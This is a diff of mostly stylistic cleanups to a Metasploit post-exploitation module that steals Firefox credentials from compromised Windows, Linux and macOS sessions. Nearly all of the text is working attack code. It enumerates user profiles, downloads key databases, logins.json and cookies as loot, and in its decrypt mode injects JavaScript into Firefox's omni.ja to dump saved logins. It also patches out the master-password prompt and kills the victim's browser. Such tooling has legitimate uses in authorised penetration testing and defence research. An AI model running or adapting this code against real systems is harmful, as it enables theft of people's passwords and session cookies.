@@ -3,20 +3,9 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-#
-# Standard Library
-#
 require 'tmpdir'
-
-#
-# Gems
-#
 require 'zip'
 
-#
-# Project
-#
-
 class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Auxiliary::Report
@@ -50,7 +39,7 @@ class MetasploitModule < Msf::Post
           'xard4s', # added decryption support
           'g0tmi1k' # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
         ],
-        'Platform' => %w{bsd linux osx unix win},
+        'Platform' => %w[bsd linux osx unix win],
         'SessionTypes' => ['meterpreter', 'shell' ],
         'Compat' => {
           'Meterpreter' => {
@@ -64,11 +53,15 @@ class MetasploitModule < Msf::Post
               stdapi_fs_stat
               stdapi_sys_config_getenv
               stdapi_sys_config_getuid
-              stdapi_sys_config_sysinfo
               stdapi_sys_process_get_processes
               stdapi_sys_process_kill
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
         }
       )
     )
@@ -86,15 +79,15 @@ class MetasploitModule < Msf::Post
 
   def run
     # Certain shells for certain platform
-    vprint_status("Determining session platform and type")
+    vprint_status('Determining session platform and type')
     case session.platform
     when 'unix', 'linux', 'bsd'
       @platform = :unix
     when 'osx'
       @platform = :osx
     when 'windows'
-      if session.type != "meterpreter"
-        print_error "Only meterpreter sessions are supported on Windows hosts"
+      if session.type != 'meterpreter'
+        print_error 'Only meterpreter sessions are supported on Windows hosts'
         return
       end
       @platform = :windows
@@ -106,11 +99,10 @@ class MetasploitModule < Msf::Post
     if datastore['DECRYPT']
       do_decrypt
     else # Non DECRYPT
-      paths = []
       paths = enum_users
 
-      if paths.nil? or paths.empty?
-        print_error("No users found with a Firefox directory")
+      if paths.nil? || paths.empty?
+        print_error('No users found with a Firefox directory')
         return
       end
 
@@ -126,14 +118,14 @@ class MetasploitModule < Msf::Post
 
     omnija = nil             # non meterpreter download
     org_file = 'omni.ja'     # key file
-    new_file = Rex::Text::rand_text_alpha(5 + rand(3)) + ".ja"
-    temp_file = "orgomni.ja" # backup of key file
+    new_file = Rex::Text.rand_text_alpha(5..7) + '.ja'
+    temp_file = 'orgomni.ja' # backup of key file
 
     # Sets @paths
     return unless decrypt_get_env
 
     # Check target for the necessary files
-    if session.type == "meterpreter"
+    if session.type == 'meterpreter'
       if session.fs.file.exist?(@paths['ff'] + temp_file) && !session.fs.file.exist?(@paths['ff'] + org_file)
         print_error("Detected #{temp_file} without #{org_file}. This is a good sign of previous DECRYPT attack gone wrong.")
         return
@@ -142,26 +134,26 @@ class MetasploitModule < Msf::Post
         if datastore['RECOVER']
           return unless decrypt_recover_omni(temp_file, org_file)
         else
-          print_warning("If you wish to continue by trying to recover, set the advanced option, RECOVER, to TRUE.")
+          print_warning('If you wish to continue by trying to recover, set the advanced option, RECOVER, to TRUE.')
           return
         end
       elsif !session.fs.file.exist?(@paths['ff'] + org_file)
         print_error("Could not download #{org_file}. File does not exist.")
         return
       end
-    end # session.type == "meterpreter"
+    end
 
-    session.type == "meterpreter" ? (size = "(%s MB)" % "%0.2f" % (session.fs.file.stat(@paths['ff'] + org_file).size / 1048576.0)) : (size = "")
-    tmp = Dir::tmpdir + "/" + new_file          # Cross platform local tempdir, "/" should work on Windows too
+    session.type == 'meterpreter' ? (size = format('(%s MB)', '%0.2f') % (session.fs.file.stat(@paths['ff'] + org_file).size / 1048576.0)) : (size = '')
+    tmp = Dir.tmpdir + '/' + new_file # Cross platform local tempdir, "/" should work on Windows too
     print_status("Downloading #{@paths['ff'] + org_file} to: #{tmp} %s" % size)
 
-    if session.type == "meterpreter"            # If meterpreter is an option, lets use it!
+    if session.type == 'meterpreter'            # If meterpreter is an option, lets use it!
       session.fs.file.download_file(tmp, @paths['ff'] + org_file)
     else                                        # Fall back shells
       omnija = read_file(@paths['ff'] + org_file)
-      if omnija.nil? or omnija.empty? or omnija =~ /No such file/i
+      if omnija.nil? || omnija.empty? || omnija =~ (/No such file/i)
         print_error("Could not download: #{@paths['ff'] + org_file}")
-        print_error("Tip: Try switching to a meterpreter shell if possible (as it's more reliable/stable when downloading)") if session.type != "meterpreter"
+        print_error("Tip: Try switching to a meterpreter shell if possible (as it's more reliable/stable when downloading)") if session.type != 'meterpreter'
         return
       end
 
@@ -176,7 +168,7 @@ class MetasploitModule < Msf::Post
       Zip::File.open(tmp) do |zip_file|
         res = decrypt_modify_omnija(zip_file)
       end
-    rescue Zip::Error => e
+    rescue Zip::Error
       print_error("Error modifying: #{tmp}")
       return
     end
@@ -184,14 +176,14 @@ class MetasploitModule < Msf::Post
     if res
       vprint_good("Successfully modified: #{tmp}")
     else
-      print_error("Failed to inject")
+      print_error('Failed to inject')
       return
     end
 
     print_status("Uploading #{tmp} to: #{@paths['ff'] + new_file}")
-    print_warning("This may take some time...") if [:unix, :osx].include?(@platform)
+    print_warning('This may take some time...') if %i[unix osx].include?(@platform)
 
-    if session.type == "meterpreter"
+    if session.type == 'meterpreter'
       session.fs.file.upload_file(@paths['ff'] + new_file, tmp)
     else
       unless upload_file(@paths['ff'] + new_file, tmp)
@@ -207,13 +199,13 @@ class MetasploitModule < Msf::Post
 
   def decrypt_disclaimer
     print_line
-    print_warning("Decrypting the keys causes the remote Firefox process to be killed.")
-    print_warning("If the user is paying attention, this could make them suspicious.")
-    print_warning("In order to proceed, set the advanced option, DISCLAIMER, to TRUE.")
+    print_warning('Decrypting the keys causes the remote Firefox process to be killed.')
+    print_warning('If the user is paying attention, this could make them suspicious.')
+    print_warning('In order to proceed, set the advanced option, DISCLAIMER, to TRUE.')
     print_line
   end
 
-  def decrypt_file_stats(temp_file, org_file, path)
+  def decrypt_file_stats(temp_file, org_file, _path)
     print_line
     print_error("Detected #{temp_file} already on the target. This could possible a possible backup of the original #{org_file} from a bad DECRYPT attack.")
     print_status("Size: #{session.fs.file.stat(@paths['ff'] + org_file).size}B (#{org_file})")
@@ -228,14 +220,14 @@ class MetasploitModule < Msf::Post
     file_rm(@paths['ff'] + org_file)
     rename_file(@paths['ff'] + temp_file, @paths['ff'] + org_file)
 
-    if session.type == "meterpreter"
+    if session.type == 'meterpreter'
       print_error("There is still #{temp_file} on the target. Something went wrong.") if session.fs.file.exist?(@paths['ff'] + temp_file)
 
       unless session.fs.file.exist?(@paths['ff'] + org_file)
         print_error("#{org_file} is no longer at #{@paths['ff'] + org_file}")
         return false
       end
-    end # session.type == "meterpreter"
+    end
 
     true
   end
@@ -244,24 +236,24 @@ class MetasploitModule < Msf::Post
     paths = []
     id = whoami
 
-    if id.nil? or id.empty?
+    if id.nil? || id.empty?
       print_error("Session #{datastore['SESSION']} is not responding")
       return
     end
 
     if @platform == :windows
-      vprint_status("Searching every possible account on the target system")
-      grab_user_profiles().each do |user|
+      vprint_status('Searching every possible account on the target system')
+      grab_user_profiles.each do |user|
         next if user['AppData'].nil?
 
         dir = check_firefox_win(user['AppData'])
         paths << dir if dir
       end
     else # unix, bsd, linux, osx
-      @platform == :osx ? (home = "/Users/") : (home = "/home/")
+      @platform == :osx ? (home = '/Users/') : (home = '/home/')
 
       if got_root
-        vprint_status("Detected ROOT privileges. Searching every account on the target system.")
+        vprint_status('Detected ROOT privileges. Searching every account on the target system.')
         userdirs = "/root\n"
         userdirs << cmd_exec("find #{home} -maxdepth 1 -mindepth 1 -type d 2>/dev/null")
       else
@@ -271,18 +263,18 @@ class MetasploitModule < Msf::Post
 
       userdirs.each_line do |dir|
         dir.chomp!
-        next if dir == "." or dir == ".." or dir =~ /No such file/i
+        next if (dir == '.') || (dir == '..') || dir =~ (/No such file/i)
 
         @platform == :osx ? (basepath = "#{dir}/Library/Application Support/Firefox/Profiles") : (basepath = "#{dir}/.mozilla/firefox")
 
         print_status("Checking for Firefox profile in: #{basepath}")
-        checkpath = cmd_exec("find " + basepath.gsub(/ /, "\\ ") + " -maxdepth 1 -mindepth 1 -type d 2>/dev/null")
+        checkpath = cmd_exec('find ' + basepath.gsub(/ /, '\\ ') + ' -maxdepth 1 -mindepth 1 -type d 2>/dev/null')
 
         checkpath.each_line do |ffpath|
           ffpath.chomp!
           if ffpath =~ /\.default(?:-release)?$/
             vprint_good("Found profile: #{ffpath}")
-            paths << "#{ffpath}"
+            paths << ffpath.to_s
           end
         end
       end
@@ -293,12 +285,16 @@ class MetasploitModule < Msf::Post
   def check_firefox_win(path)
     paths = []
     ffpath = []
-    path = path + "\\Mozilla\\"
+    path += '\\Mozilla\\'
     print_status("Checking for Firefox profile in: #{path}")
 
-    stat = session.fs.file.stat(path + "Firefox\\profiles.ini") rescue nil
+    stat = begin
+      session.fs.file.stat(path + 'Firefox\\profiles.ini')
+    rescue StandardError
+      nil
+    end
     if !stat
-      print_error("Firefox was not found (Missing profiles.ini)")
+      print_error('Firefox was not found (Missing profiles.ini)')
       return
     end
 
@@ -309,31 +305,31 @@ class MetasploitModule < Msf::Post
     end
 
     if ffpath.empty?
-      print_error("Firefox was not found")
+      print_error('Firefox was not found')
       return
     end
 
     # print_status("Locating Firefox profiles")
-    path << "Firefox\\Profiles\\"
+    path << 'Firefox\\Profiles\\'
 
     # We should only have profiles in the Profiles directory store them all
     begin
       session.fs.dir.foreach(path) do |pdirs|
-        next if pdirs == "." or pdirs == ".."
+        next if (pdirs == '.') || (pdirs == '..')
 
         vprint_good("Found profile: #{path + pdirs}")
         paths << path + pdirs
       end
-    rescue
-      print_error("Profiles directory is missing")
+    rescue StandardError
+      print_error('Profiles directory is missing')
       return
     end
 
-    paths.empty? ? (nil) : (paths)
+    paths.empty? ? nil : paths
   end
 
   def download_loot(paths)
-    loot = ""
+    loot = ''
     print_line
 
     paths.each do |path|
@@ -342,29 +338,29 @@ class MetasploitModule < Msf::Post
       #   win: C:\Users\administrator\AppData\Roaming\Mozilla\Firefox\Profiles\tsnwjx4g.default
       # linux: /root/.mozilla/firefox/tsnwjx4g.default         (iceweasel)
       #   osx: /Users/mbp/Library/Application Support/Firefox/Profiles/tsnwjx4g.default
-      profile = path.scan(/Profiles[\\|\/](.+)\.(.+)$/).flatten[0].to_s
-      profile = path.scan(/firefox[\\|\/](.+)\.(.+)$/).flatten[0].to_s if profile.empty?
+      profile = path.scan(%r{Profiles[\\|/](.+)\.(.+)$}).flatten[0].to_s
+      profile = path.scan(%r{firefox[\\|/](.+)\.(.+)$}).flatten[0].to_s if profile.empty?
 
-      session.type == "meterpreter" ? (files = session.fs.dir.foreach(path)) : (files = cmd_exec("find " + path.gsub(/ /, "\\ ") + " -maxdepth 1 -mindepth 1 -type f 2>/dev/null").gsub(/.*\//, "").split("\n"))
+      session.type == 'meterpreter' ? (files = session.fs.dir.foreach(path)) : (files = cmd_exec('find ' + path.gsub(/ /, '\\ ') + ' -maxdepth 1 -mindepth 1 -type f 2>/dev/null').gsub(%r{.*/}, '').split("\n"))
 
       files.each do |file|
         file.chomp!
-        if file =~ /^key\d\.db$/ or file =~ /^cert\d\.db$/ or file =~ /^signons.sqlite$/i or file =~ /^cookies\.sqlite$/ or file =~ /^logins\.json$/
-          ext = file.split('.')[2]
-          ext == "txt" ? (mime = "plain") : (mime = "binary")
-          vprint_status("Downloading: #{file}")
-          if @platform == :windows
-            p = store_loot("ff.#{profile}.#{file}", "#{mime}/#{ext}", session, "firefox_#{file}")
-            session.fs.file.download_file(p, path + "\\" + file)
-            print_good("Downloaded #{file}: #{p.to_s}")
-          else # windows has to be meterpreter, so can be anything else (unix, bsd, linux, osx)
-            loot = cmd_exec("cat #{path}//#{file}", nil, datastore['DOWNLOAD_TIMEOUT'])
-            if loot.nil? || loot.empty?
-              print_error("Failed to download #{file}, if the file is very long, try increasing DOWNLOAD_TIMEOUT")
-            else
-              p = store_loot("ff.#{profile}.#{file}", "#{mime}/#{ext}", session, loot, "firefox_#{file}", "#{file} for #{profile}")
-              print_good("Downloaded #{file}: #{p.to_s}")
-            end
+        next unless file =~ (/^key\d\.db$/) || file =~ (/^cert\d\.db$/) || file =~ (/^signons.sqlite$/i) || file =~ (/^cookies\.sqlite$/) || file =~ (/^logins\.json$/)
+
+        ext = file.split('.')[2]
+        ext == 'txt' ? (mime = 'plain') : (mime = 'binary')
+        vprint_status("Downloading: #{file}")
+        if @platform == :windows
+          p = store_loot("ff.#{profile}.#{file}", "#{mime}/#{ext}", session, "firefox_#{file}")
+          session.fs.file.download_file(p, path + '\\' + file)
+          print_good("Downloaded #{file}: #{p}")
+        else # windows has to be meterpreter, so can be anything else (unix, bsd, linux, osx)
+          loot = cmd_exec("cat #{path}//#{file}", nil, datastore['DOWNLOAD_TIMEOUT'])
+          if loot.nil? || loot.empty?
+            print_error("Failed to download #{file}, if the file is very long, try increasing DOWNLOAD_TIMEOUT")
+          else
+            p = store_loot("ff.#{profile}.#{file}", "#{mime}/#{ext}", session, loot, "firefox_#{file}", "#{file} for #{profile}")
+            print_good("Downloaded #{file}: #{p}")
           end
         end
       end
@@ -376,16 +372,17 @@ class MetasploitModule < Msf::Post
   def decrypt_get_env
     @paths = {}
     check_paths = []
-    loot_file = Rex::Text::rand_text_alpha(6) + ".txt"
+    loot_file = Rex::Text.rand_text_alpha(6) + '.txt'
 
     case @platform
     when :windows
-      unless got_root || session.sys.config.sysinfo['OS'] =~ /xp/i
-        print_warning("You may need SYSTEM privileges on this platform for the DECRYPT option to work")
+      version = get_version_info
+      unless got_root || version.xp_or_2003?
+        print_warning('You may need SYSTEM privileges on this platform for the DECRYPT option to work')
       end
 
       env_vars = session.sys.config.getenvs('TEMP', 'SystemDrive')
-      tmpdir = env_vars['TEMP'] + "\\"
+      tmpdir = env_vars['TEMP'] + '\\'
       drive = env_vars['SystemDrive']
 
       # This way allows for more independent use of meterpreter payload (32 and 64 bit) and cleaner code
@@ -393,12 +390,12 @@ class MetasploitModule < Msf::Post
       check_paths << drive + '\\Program Files (x86)\\Mozilla Firefox\\'
     when :unix
       unless got_root
-        print_error("You need ROOT privileges on this platform for DECRYPT option")
+        print_error('You need ROOT privileges on this platform for DECRYPT option')
         return false
       end
       # Unix matches linux|unix|bsd but BSD is not supported
       if session.platform =~ /bsd/
-        print_error("Sorry, BSD is not supported by the DECRYPT option")
+        print_error('Sorry, BSD is not supported by the DECRYPT option')
         return false
       end
 
@@ -414,9 +411,9 @@ class MetasploitModule < Msf::Post
     end
 
     @paths['ff'] = check_paths.find do |p|
-      check = p.sub(/(\\|\/)(mozilla\s)?firefox.*/i, '')
+      check = p.sub(%r{(\\|/)(mozilla\s)?firefox.*}i, '')
       vprint_status("Checking for Firefox directory in: #{check}")
-      if directory?(p.sub(/(\\|\/)$/, ''))
+      if directory?(p.sub(%r{(\\|/)$}, ''))
         print_good("Found Firefox directory: #{check}")
         true
       else
@@ -425,7 +422,7 @@ class MetasploitModule < Msf::Post
     end
 
     if @paths['ff'].nil?
-      print_error("No Firefox directory found")
+      print_error('No Firefox directory found')
       return false
     end
 
@@ -449,10 +446,10 @@ class MetasploitModule < Msf::Post
       begin
         fdata['content'] = zip.read(omnija_file) unless omnija_file =~ /jsloader/
         fdata['outs'] = zip.get_output_stream(omnija_file)
-      rescue
+      rescue StandardError
         print_error("Was not able to find '#{omnija_file}' in the compressed .JA file")
-        print_error("This could be due to a corrupt download or a unsupported Firefox/Iceweasel version")
-        return false
+        print_error('This could be due to a corrupt download or a unsupported Firefox/Iceweasel version')
+        break
       end
       fdata
     end
@@ -462,20 +459,20 @@ class MetasploitModule < Msf::Post
     stor_js['outs_res'] = res_js['outs']
 
     # Insert payload (close after starting up - allowing evil js to run and nothing else)
-    wnd_close = "window.close();"
+    wnd_close = 'window.close();'
     onload = "Startup(); SignonsStartup(); #{wnd_close}"
 
     # Patch commonDialog.xul - Get rid of (possible) master password prompt
     dlog_xul['content'].sub!(/commonDialogOnLoad\(\);/, wnd_close)
     dlog_xul['outs'].write(dlog_xul['content'])
     dlog_xul['outs'].close
-    vprint_good("[1/2] XUL injected - commonDialog.xul")
+    vprint_good('[1/2] XUL injected - commonDialog.xul')
 
     # Patch passwordManager.xul - Close password manager immediately
     pwd_xul['content'].sub!(/Startup\(\); SignonsStartup\(\);/, onload)
     pwd_xul['outs'].write(pwd_xul['content'])
     pwd_xul['outs'].close
-    vprint_good("[2/2] XUL injected - passwordManager.xul")
+    vprint_good('[2/2] XUL injected - passwordManager.xul')
 
     # Patch ./components/storage-mozStorage.js - returns true or false
     return decrypt_patch_method(stor_js)
@@ -483,15 +480,15 @@ class MetasploitModule < Msf::Post
 
   # Patches getAllLogins() methods in ./components/storage-mozStorage.js
   def decrypt_patch_method(stor_js)
-    data = ""
+    data = ''
     # Imports needed for IO
-    imports = %Q|Components.utils.import("resource://gre/modules/NetUtil.jsm");
+    imports = %|Components.utils.import("resource://gre/modules/NetUtil.jsm");
 Components.utils.import("resource://gre/modules/FileUtils.jsm");
 Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
 |
 
     # Javascript code to intercept the logins array and write the credentials to a file
-    method_epilog = %Q|
+    method_epilog = %|
         var data = "";
         var path = "#{@paths['loot'].inspect.gsub(/"/, '')}";
         var file = new FileUtils.File(path);
@@ -518,7 +515,7 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
     regex = [
       nil, # dirty hack alert
       [/return\slogins;/, method_epilog],
-      [/Components\.utils\.import\("resource:\/\/gre\/modules\/XPCOMUtils\.jsm"\);/, imports]
+      [%r{Components\.utils\.import\("resource://gre/modules/XPCOMUtils\.jsm"\);}, imports]
     ]
 
     # Match the last two regular expressions
@@ -526,14 +523,14 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
     x = i
     stor_js['content'].each_line do |line|
       # There is no real substitution if the matching regex has no corresponding patch code
-      if i != 0 && line.sub!(regex[i][0]) do |match|
+      if i != 0 && line.sub!(regex[i][0]) do |_match|
         if regex[i][1]
           vprint_good("[#{x - i + 1}/#{x}] Javascript injected - ./components/storage-mozStorage.js")
           regex[i][1]
         end
-      end # do |match|
+      end
         i -= 1
-      end # if i != 0
+      end
       data << line
     end
 
@@ -543,7 +540,7 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
     stor_js['outs'].close
     stor_js['outs_res'].close
 
-    i == 0 ? (true) : (false)
+    i == 0
   end
 
   # Starts a new Firefox process and triggers decryption
@@ -559,47 +556,47 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
     case @platform
     when :unix
       # Assuming userdir /home/(x) = user
-      print_status("Enumerating users")
-      homedirs = cmd_exec("find /home -maxdepth 1 -mindepth 1 -type d 2>/dev/null").gsub(/.*\//, "")
-      if homedirs.nil? or homedirs.empty?
-        print_error("No normal user found")
+      print_status('Enumerating users')
+      homedirs = cmd_exec('find /home -maxdepth 1 -mindepth 1 -type d 2>/dev/null').gsub(%r{.*/}, '')
+      if homedirs.nil? || homedirs.empty?
+        print_error('No normal user found')
         return false
       end
       user = nil
       # Skip home directories which contain a space, as those are likely not usernames...
       homedirs.each_line do |homedir|
         user = homedir.chomp
-        break unless user.index(" ")
+        break unless user.index(' ')
       end
 
       # Since we can't access the display environment variable we have to assume the default value
       args.insert(0, "\"#{@paths['ff']}firefox --display=:0 ")
-      args << "\""
+      args << '"'
       cmd = "su #{user} -c"
     when :windows, :osx
-      cmd = @paths['ff'] + "firefox"
+      cmd = @paths['ff'] + 'firefox'
       # On OSX, run in background
-      args << "& sleep 5 && killall firefox" if @platform == :osx
+      args << '& sleep 5 && killall firefox' if @platform == :osx
     end
 
     # Check if Firefox is running and kill it
-    if session.type == "meterpreter"
+    if session.type == 'meterpreter'
       session.sys.process.each_process do |p|
-        if p['name'] =~ /firefox\.exe/
-          print_status("Found running Firefox process, attempting to kill.")
-          unless session.sys.process.kill(p['pid'])
-            print_error("Could not kill Firefox process")
-            return false
-          end
+        next unless p['name'] =~ /firefox\.exe/
+
+        print_status('Found running Firefox process, attempting to kill.')
+        unless session.sys.process.kill(p['pid'])
+          print_error('Could not kill Firefox process')
+          return false
         end
       end
     else # windows has to be meterpreter, so can be anything else (unix, bsd, linux, osx)
-      p = cmd_exec("ps", "cax | grep firefox")
+      p = cmd_exec('ps', 'cax | grep firefox')
       if p =~ /firefox/
-        print_status("Found running Firefox process, attempting to kill.")
-        term = cmd_exec("killall", "firefox && echo true")
+        print_status('Found running Firefox process, attempting to kill.')
+        term = cmd_exec('killall', 'firefox && echo true')
         if term !~ /true/
-          print_error("Could not kill Firefox process")
+          print_error('Could not kill Firefox process')
           return false
         end
       end
@@ -614,7 +611,7 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
     #   omni.ja (evil)               -> *random*.ja (pointless temp file)
     #   orgomni.ja (original_backup) -> omni.ja (original)
     #
-    vprint_status("Renaming .JA files")
+    vprint_status('Renaming .JA files')
     rename_file(org_file, temp_file)
     rename_file(new_file, org_file)
 
@@ -624,16 +621,16 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
     sleep(1)
 
     # Lets just check theres something before going forward
-    if session.type == "meterpreter"
+    if session.type == 'meterpreter'
       i = 20
       vprint_status("Waiting up to #{i} seconds for loot file (#{@paths['loot']}) to be generated") unless session.fs.file.exist?(@paths['loot'])
-      while (!session.fs.file.exist?(@paths['loot']))
+      until session.fs.file.exist?(@paths['loot'])
         sleep 1
         i -= 1
         break if i == 0
       end
-      print_error("Missing loot file. Something went wrong.") unless session.fs.file.exist?(@paths['loot'])
-    end # session.type == "meterpreter"
+      print_error('Missing loot file. Something went wrong.') unless session.fs.file.exist?(@paths['loot'])
+    end
 
     print_status("Restoring original .JA: #{temp_file}")
     rename_file(org_file, new_file)
@@ -642,23 +639,21 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
     # Clean up
     vprint_status("Cleaning up: #{new_file}")
     file_rm(new_file)
-    if session.type == "meterpreter"
+    if session.type == 'meterpreter'
       if session.fs.file.exist?(temp_file)
         print_error("Detected backup file (#{temp_file}) still on the target. Something went wrong.")
       end
       unless session.fs.file.exist?(org_file)
         print_error("Unable to find #{org_file} on target. Something went wrong.")
       end
-    end # session.type == "meterpreter"
+    end
 
     # At this time, there should have a loot file
-    if session.type == "meterpreter"
-      unless session.fs.file.exist?(@paths['loot'])
-        print_error("DECRYPT failed. Either something went wrong (download/upload? Injecting?), there is a master password or an unsupported Firefox version.")
-        # Another issue is encoding. The files may be seen as 'data' rather than 'ascii'
-        print_error("Tip: Try swtiching to a meterpreter shell if possible (as its more reliable/stable when downloading/uploading)") if session.type != "meterpreter"
-        return false
-      end
+    if session.type == 'meterpreter' && !session.fs.file.exist?(@paths['loot'])
+      print_error('DECRYPT failed. Either something went wrong (download/upload? Injecting?), there is a master password or an unsupported Firefox version.')
+      # Another issue is encoding. The files may be seen as 'data' rather than 'ascii'
+      print_error('Tip: Try swtiching to a meterpreter shell if possible (as its more reliable/stable when downloading/uploading)') if session.type != 'meterpreter'
+      return false
     end
 
     true
@@ -669,7 +664,7 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
     loot = read_file(@paths['loot'])
 
     if loot =~ /no creds/
-      print_status("No Firefox credentials where found")
+      print_status('No Firefox credentials where found')
       return
     end
 
@@ -689,9 +684,9 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
         ]
     )
 
-    creds = loot.split("^")
+    creds = loot.split('^')
     creds.each do |cred|
-      hostname, user, pass = cred.rstrip.split(" :: ")
+      hostname, user, pass = cred.rstrip.split(' :: ')
       cred_table << [hostname, user, pass]
 
       # Creds API
@@ -702,8 +697,8 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
       credential_data = {
         origin_type: :session,
         session_id: session_db_id,
-        post_reference_name: self.refname,
-        smodule_fullname: self.fullname,
+        post_reference_name: refname,
+        smodule_fullname: fullname,
         username: user,
         private_data: pass,
         private_type: :password
@@ -714,14 +709,14 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
 
     # Create local loot csv file
     path = store_loot(
-      "firefox.creds",
-      "text/plain",
+      'firefox.creds',
+      'text/plain',
       session,
       cred_table.to_csv,
-      "firefox_credentials.txt",
-      "Firefox Credentials"
+      'firefox_credentials.txt',
+      'Firefox Credentials'
     )
-    vprint_good("Saved loot: #{path.to_s}")
+    vprint_good("Saved loot: #{path}")
 
     # Display out
     vprint_line("\n" + cred_table.to_s)
@@ -732,12 +727,12 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
     when :windows
       session.sys.config.getuid =~ /SYSTEM/ ? true : false
     else # unix, bsd, linux, osx
-      id_output = cmd_exec("id").chomp
+      id_output = cmd_exec('id').chomp
       if id_output.blank?
         # try an absolute path
-        id_output = cmd_exec("/usr/bin/id").chomp
+        id_output = cmd_exec('/usr/bin/id').chomp
       end
-      id_output.include?("uid=0(") ? true : false
+      id_output.include?('uid=0(') ? true : false
     end
   end
 
@@ -745,7 +740,7 @@ Components.utils.import("resource://gre/modules/XPCOMUtils.jsm");
     if @platform == :windows
       id = session.sys.config.getenv('USERNAME')
     else
-      id = cmd_exec("id -un")
+      id = cmd_exec('id -un')
     end
 
     id
